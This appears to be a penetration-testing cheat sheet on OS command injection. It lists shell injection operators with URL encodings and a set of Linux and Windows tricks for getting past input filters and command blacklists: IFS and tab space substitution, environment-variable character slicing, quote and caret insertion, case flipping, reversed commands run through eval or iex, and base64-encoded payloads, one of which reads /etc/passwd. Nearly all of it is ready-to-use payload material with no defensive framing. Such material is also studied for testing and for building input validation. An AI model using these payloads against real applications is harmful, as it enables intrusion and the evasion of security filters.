Command-injections

🔧 Injection Operators

🧪 Semicolon

;       %3b       # → Executes both commands (Linux & Windows)

🔃 New Line

\n      %0a       # → Executes both commands (Linux & Windows)

🖼️ Background

&       %26       # → Executes both commands (second output usually appears first)

🧵 Pipe

|       %7c       # → Executes both commands (only second output is shown)

🟢 AND Operator

&&      %26%26    # → Executes second command only if first succeeds (Linux & Windows)

🔴 OR Operator

||      %7c%7c     # → Executes second command only if first fails (Linux & Windows)

🌀 Sub-Shell (Linux Only)

``       %60%60        # → Sub-shell execution (Linux-only)
$()      %24%28%29     # → Sub-shell execution (Linux-only)

---

🐧 Linux - Filtered Character Bypass

🔍 View Environment Variables

printenv         # Displays all environment variables

⛓️ Space Bypass

%09             # Use tab instead of space
${IFS}          # Replaced with space/tab (Not usable in sub-shells)
{ls,-la}        # Commas replaced with spaces

🔀 Other Character Bypass

${PATH:0:1}               # Replaced with /
${LS_COLORS:10:1}         # Replaced with ;
$(tr '!-}' '"-~'<<<[)     # Shift character by one ([ -> \)

⛔ Blacklisted Command Bypass

✒️ Character Insertion

' or "    # Must be even number of quotes
$@ or \   # Linux only

🔠 Case Manipulation

$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")   # Lowercase conversion and execution
$(a="WhOaMi";printf %s "${a,,}")   # Another lowercase technique

🔄 Reversed Commands

echo 'whoami' | rev     # Reverse string
eval $(rev<<<'imaohw')  # Execute reversed command

📦 Encoded Commands

echo -n 'cat /etc/passwd | grep 33' | base64     # Encode with base64
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==) # Execute base64 encoded command

---

📦 Windows - Filtered Character Bypass

🔍 View Environment Variables (PowerShell)

Get-ChildItem Env:      # View all environment variables

⛓️ Space Bypass

%09                     # Tab instead of space
%PROGRAMFILES:~10,-5%   # CMD: Replaced with space
$env:PROGRAMFILES[10]   # PowerShell: Replaced with space

🔁 Other Character Bypass

%HOMEPATH:~0,-17%    # CMD: Replaced with \

$env:HOMEPATH[0]     # PowerShell: Replaced with \

⛔ Blacklisted Command Bypass

✒️ Character Insertion

' or "       # Must be even

^            # Windows-only escape character (CMD)

🔠 Case Manipulation

WhoAmi                                 # Use odd case to bypass basic filters

🔄 Reversed Commands

"whoami"[-1..-20] -join ''             # Reverse string

iex "$('imaohw'[-1..-20] -join '')"    # Execute reversed command

📦 Encoded Commands

[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('whoami')) # Encode command


iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))" # Decode & execute